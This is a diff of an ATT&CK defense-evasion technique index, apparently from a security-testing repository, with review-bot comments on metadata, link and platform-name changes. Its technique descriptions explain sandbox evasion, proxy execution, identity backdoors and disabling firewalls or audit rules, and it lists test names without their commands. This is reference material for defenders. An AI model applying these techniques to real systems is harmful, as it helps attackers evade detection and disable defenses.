- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
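Review bot: the deletion of `spec_version: '2.1'` at the top of this hunk recurs for every technique in this patch, which is a schema change in the emitted YAML; the commit message should state that the generator no longer writes the STIX `spec_version` field so consumers of these files are not surprised. The remainder of the hunk is a field reorder of T1497.003: the removed `x_mitre_platforms`, `x_mitre_contributors` and `external_references` blocks reappear lower in the same object, so review the object as a whole rather than trusting the line-level diff.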
@@ -5963,6 +6068,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -5972,9 +6083,14 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -5984,8 +6100,44 @@ defense-evasion:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests:
- name: Delay execution with ping
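Review bot: the `Deloitte Environment Awareness` reference at the end of this hunk changes its url to end in `/edit` and bumps the retrieval date to September 13, 2024; on Google Drive the `/edit` path is the editor view, so please confirm the link resolves for readers without edit access and that the change mirrors the upstream ATT&CK object rather than a paste from a browser address bar. The `x_mitre_attack_spec_version` bump from 2.1.0 to 3.2.0 while `x_mitre_version` stays '1.2' is consistent with a data-format update only.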
@@ -6014,7 +6166,7 @@ defense-evasion:
name: sh
T1218.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:35:43.077Z'
name: 'Signed Binary Proxy Execution: CMSTP'
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -6060,8 +6212,8 @@ defense-evasion:
external_id: T1218.003
- source_name: Twitter CMSTP Usage Jan 2018
description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
- Retrieved April 11, 2018.
- url: https://twitter.com/ItsReallyNick/status/958789644165894146
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/958789644165894146
- source_name: Microsoft Connection Manager Oct 2009
description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
April 11, 2018.
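Review bot: the `Twitter CMSTP Usage Jan 2018` url swaps twitter.com for x.com with the same status ID and a new Retrieved date (September 12, 2024); the same rewrite recurs for the `Twitter CMSTP Jan 2018` and `change_rdp_port_conti` citations later in the patch, so consider stating in the commit message that this tracks upstream ATT&CK rather than a local link check, so a future sync does not flip them back.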
@@ -6080,13 +6232,12 @@ defense-evasion:
url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
- source_name: Twitter CMSTP Jan 2018
description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
- applocker bypass. Retrieved April 11, 2018.
- url: https://twitter.com/NickTyrer/status/958450014111633408
+ applocker bypass. Retrieved September 12, 2024.
+ url: https://x.com/NickTyrer/status/958450014111633408
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.003
atomic_tests: []
T1562.002:
@@ -6201,7 +6352,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.002
atomic_tests: []
T1218.002:
@@ -6242,7 +6392,7 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T19:01:55.821Z'
name: 'Signed Binary Proxy Execution: Control Panel'
description: |-
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
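Review bot: `modified` for T1218.002 moves backwards, from 2022-05-11T14:00:00.188Z to 2022-03-11T19:01:55.821Z, and the same regression appears for T1599.001, T1553.003, T1207, T1553.006, T1574.006 and T1222 further down; the old values all share the `14:00:00.188Z` suffix typical of a bundle release timestamp. This looks like the generator switching from the bundle timestamp to the object's own `modified` field; if so, say it in the commit message, since consumers that use `modified` to detect upstream changes will now see these objects as older than before.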
@@ -6281,8 +6431,6 @@ defense-evasion:
- User
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.002
atomic_tests: []
T1599.001:
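Review bot: this hunk deletes `x_mitre_attack_spec_version: 2.1.0` from T1218.002 without adding a replacement, whereas the other reworked objects in this patch receive `x_mitre_attack_spec_version: 3.2.0`; T1599.001 and T1207 lose the field the same way below. Please confirm the upstream objects genuinely lack the field rather than the generator dropping it when it is not at the expected position in the object.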
@@ -6305,7 +6453,7 @@ defense-evasion:
url: https://tools.ietf.org/html/rfc1918
description: IETF Network Working Group. (1996, February). Address Allocation
for Private Internets. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T01:45:58.951Z'
name: Network Address Translation Traversal
description: "Adversaries may bridge network boundaries by modifying a network
device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -6344,12 +6492,10 @@ defense-evasion:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -6376,6 +6522,7 @@ defense-evasion:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -6393,12 +6540,12 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
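Review bot: the platform list for T1550 drops `Office 365` and `Google Workspace` in favour of `Identity Provider` and `Office Suite` (with `x_mitre_version` 1.3 to 1.4), and the same rename lands on T1556.007 (which also loses `Azure AD`) and T1078.001 later in the patch. Any per-platform index or filter keyed on the old platform strings will silently lose these techniques, so index files generated from `x_mitre_platforms` need regenerating in the same change, and downstream detection mappings that key on `Office 365`, `Google Workspace` or `Azure AD` should be migrated to the new names.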
@@ -6424,18 +6571,17 @@ defense-evasion:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.004:
technique:
- modified: '2024-03-28T00:01:08.337Z'
+ modified: '2024-09-12T19:37:57.867Z'
name: 'Impair Defenses: Disable or Modify System Firewall'
description: |-
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
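Review bot: the `NIST MFA` url changes from `.../term/Multi_Factor-Authentication` to `.../term/multi_factor_authentication` together with a new Retrieved date (September 25, 2024); that is a link correction rather than a cosmetic change and deserves a line in the commit message.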
@@ -6480,13 +6626,12 @@ defense-evasion:
url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.004
atomic_tests:
- name: Stop/Start UFW firewall
@@ -6913,7 +7058,7 @@ defense-evasion:
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T04:58:58.214Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
x_mitre_detection: |-
@@ -6946,35 +7091,34 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.003
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
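Review bot: the Azure AD to Entra ID rename is applied to the prose only, which is correct: the `(Citation: Azure AD Hybrid Identity)`, `(Citation: Azure AD Connect for Read Teamers)` and `(Citation: AADInternals Azure AD On-Prem to Cloud)` keys must keep matching their `source_name` entries, and `AzureADConnectAuthenticationAgentService` is a literal service name that has not been renamed. One readability point: the folded scalar now wraps between `Entra` and `ID` in three places; YAML folds that back to a single space, but a plain grep of the file for `Entra ID` will miss those occurrences, so a wider wrap width in the generator would help if it is configurable.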
@@ -6982,9 +7126,9 @@ defense-evasion:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -6993,21 +7137,22 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -7047,9 +7192,6 @@ defense-evasion:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.015:
technique:
@@ -7112,7 +7254,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.012:
technique:
@@ -7172,7 +7313,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.012
atomic_tests:
- name: Delete all auditd rules using auditctl
@@ -7279,7 +7419,7 @@ defense-evasion:
description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
Retrieved March 30, 2018.
source_name: ADDSecurity DCShadow Feb 2018
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:20:04.850Z'
name: Rogue Domain Controller
description: |-
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -7310,8 +7450,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1207
atomic_tests: []
T1553.006:
@@ -7401,7 +7539,7 @@ defense-evasion:
Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
Driver Loader)"
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:03.480Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -7425,12 +7563,11 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -7509,7 +7646,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1112:
@@ -7594,12 +7730,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1112
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -7618,6 +7753,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -7625,7 +7761,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -7645,29 +7780,31 @@ defense-evasion:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1535:
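Review bot: the `Windows NT Command Shell` reference in this hunk keeps its December 5, 2014 retrieval date and `docs.microsoft.com/en-us/previous-versions` url while the neighbouring `Microsoft CreateProcess` and `Microsoft WinExec` entries were refreshed to learn.microsoft.com with September 12, 2024 dates, so it deserves the same link check. The new CreateProcess url points at the `nf-processthreadsapi-createprocessa` page (the ANSI variant) while the description still reads 'CreateProcess function'; that is the canonical doc page, so no change needed, just noting it for anyone diffing descriptions against urls.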
@@ -7718,7 +7855,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.001:
technique:
@@ -7785,7 +7921,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1027.001
atomic_tests:
- name: Pad Binary to Change Hash - Linux/macOS dd
@@ -7857,7 +7992,7 @@ defense-evasion:
name: sh
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -7893,6 +8028,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -7904,16 +8043,12 @@ defense-evasion:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -7949,12 +8084,12 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
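Review bot: both harmj0y citations move from plain `http://www.harmj0y.net/blog/...` to `https://blog.harmj0y.net/...` with September 23, 2024 retrieval dates, which fixes unencrypted reference links; the `TechNet Group Policy Basics` entry in the same block keeps its `blogs.technet.microsoft.com` url and March 5, 2019 retrieval date and was not refreshed with the others, so it deserves the same link check.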
@@ -7962,14 +8097,13 @@ defense-evasion:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
